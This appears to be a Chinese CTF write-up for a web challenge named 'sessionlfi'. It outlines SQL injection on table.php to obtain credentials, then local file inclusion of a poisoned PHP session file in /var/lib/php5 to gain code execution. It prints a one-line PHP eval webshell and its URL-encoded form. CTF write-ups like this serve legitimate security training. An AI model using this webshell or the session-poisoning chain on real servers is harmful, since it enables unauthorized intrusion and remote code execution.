当前位置:网站首页>小学期,第三场-下午:WEB_sessionlfi

小学期,第三场-下午:WEB_sessionlfi

2022-06-30 19:06:00 Part 02

扫出

login.php

table.php

login.php 源码有提示 table.php?id

table.php 有注入报错

如果没有提示也可以 fuzz 出

通过简单 sql 注入得到 账号-密码

进入 home.php

可以读文件

读不了 /flag.txt 

抓包

 user_pref 的值为我们输入的值,有漏洞

php 5.4.6服务端生成的session id

例如:

sess_00nrqa20hjrlaiac0eu726i4q5      

sess_89j9ifuqrbplk0rti2va2k1ha0      

sess_g2rv1kd6ijsj6g6c9jq5mqglv5 

响应包可以看到服务器用 ubuntu 

Ubuntu 默认 session 会话:

php5 sessions in /var/lib/php5

Php5 sessions in /var/lib/php5

确实可以访问到

把小马 URL 全字符编码

<?php eval($_GET[1]);?>

%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%47%45%54%5b%31%5d%29%3b%3f%3e

 %20 为空格,连接 /

执行成功,接下来读取就行

原网站

版权声明
本文为[Part 02]所创,转载请带上原文链接,感谢
https://blog.csdn.net/qq_62260856/article/details/125531157

边栏推荐

猜你喜欢

随机推荐